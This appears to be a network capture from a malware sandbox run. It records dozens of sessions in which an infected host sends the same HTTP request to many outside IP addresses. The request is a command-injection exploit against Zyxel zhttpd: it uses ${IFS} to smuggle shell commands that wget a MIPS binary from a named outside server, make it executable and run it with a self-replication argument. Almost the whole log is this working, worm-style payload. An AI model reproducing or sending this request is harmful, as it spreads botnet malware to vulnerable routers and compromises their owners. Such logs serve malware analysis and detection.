                                                Jan 29, 2024 07:07:41.175254107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2652192.168.2.234783059.126.204.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175318003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2653192.168.2.2349066110.131.200.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175342083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2654192.168.2.234604635.47.23.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175388098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2655192.168.2.2351548115.177.126.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175426960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2656192.168.2.235790023.26.196.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175484896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2657192.168.2.2349176179.117.219.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175509930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2658192.168.2.2339594206.240.246.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175543070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2659192.168.2.2338484197.103.249.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175578117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2660192.168.2.234577480.242.11.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175611019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2661192.168.2.2352072101.249.203.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175630093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2662192.168.2.2342878152.100.107.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175667048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2663192.168.2.2360620168.187.224.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175700903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2664192.168.2.2339800201.48.41.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175743103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2665192.168.2.2333814173.113.157.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175787926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2666192.168.2.234677084.177.193.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175825119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2667192.168.2.233655443.165.94.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175842047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2668192.168.2.233521259.182.190.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175877094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2669192.168.2.235999495.213.169.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175906897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2670192.168.2.2348848181.90.181.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175934076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2671192.168.2.2338672149.32.81.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175971985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2672192.168.2.2339220179.10.9.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176013947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2673192.168.2.23538705.250.139.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176060915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2674192.168.2.234220694.165.209.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176094055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2675192.168.2.2341226165.213.103.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176140070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2676192.168.2.2341710159.143.233.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176165104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2677192.168.2.2341830145.96.73.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176193953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2678192.168.2.2344242188.251.24.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176240921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2679192.168.2.2338998147.91.206.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176275969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2680192.168.2.2349868157.219.18.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176312923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2681192.168.2.234173252.163.224.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176345110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2682192.168.2.233802857.103.8.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176398993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2683192.168.2.2346336170.57.66.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176435947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2684192.168.2.235266858.119.198.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176487923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2685192.168.2.234973075.149.37.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176518917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2686192.168.2.2341458186.23.201.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176542997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2687192.168.2.234755014.156.23.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176579952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2688192.168.2.2341088142.125.2.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176640034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2689192.168.2.2348722217.67.91.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176667929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2690192.168.2.2358740201.201.114.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176706076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2691192.168.2.2357132221.9.147.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176772118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2692192.168.2.2348754223.146.58.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176785946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2693192.168.2.2333748117.67.176.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176820993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2694192.168.2.2341572199.146.135.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176852942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2695192.168.2.2358278208.158.5.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176881075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2696192.168.2.234470038.94.27.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176924944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2697192.168.2.2343618156.241.35.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.176959991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2698192.168.2.2335078107.100.232.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177000046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2699192.168.2.23337545.25.58.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177017927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2700192.168.2.2353616144.248.5.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177059889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2701192.168.2.2343564160.106.250.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177092075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2702192.168.2.2351668213.113.115.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177100897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2703192.168.2.235883832.130.85.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177160978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2704192.168.2.235955051.123.130.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177222013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2705192.168.2.233291292.215.210.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177262068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2706192.168.2.23415788.234.115.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177313089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2707192.168.2.2355280175.100.1.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177344084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2708192.168.2.2357582146.101.247.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177369118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2709192.168.2.233966049.213.105.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177393913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2710192.168.2.2341850120.249.231.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.177411079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2711192.168.2.235348296.33.243.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189395905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2712192.168.2.233906476.36.241.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189430952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2713192.168.2.2353340108.50.91.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189460993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2714192.168.2.2353088162.192.90.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189490080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2715192.168.2.235832458.99.36.188443
                                                TimestampBytes transferredDirectionData
